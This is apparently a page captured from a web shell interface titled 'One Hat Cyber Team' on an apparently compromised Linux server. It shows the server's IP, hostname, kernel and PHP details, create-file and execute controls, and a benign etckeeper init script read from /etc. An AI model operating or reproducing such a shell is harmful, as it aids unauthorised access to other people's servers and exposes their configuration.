⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.13
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
etckeeper
/
init.d
/
View File Name :
20restore-etckeeper
#!/bin/sh set -e # Used by .etckeeper to run a command if the file it acts on # (the last parameter) exists. maybe () { command="$1" shift 1 if eval [ -e "\"\$$#\"" ]; then "$command" "$@" fi } # Yes, this runs code from the repository. As documented, etckeeper-init # should only be run on repositories you trust. if [ -e .etckeeper ]; then . ./.etckeeper else touch .etckeeper chmod 600 .etckeeper fi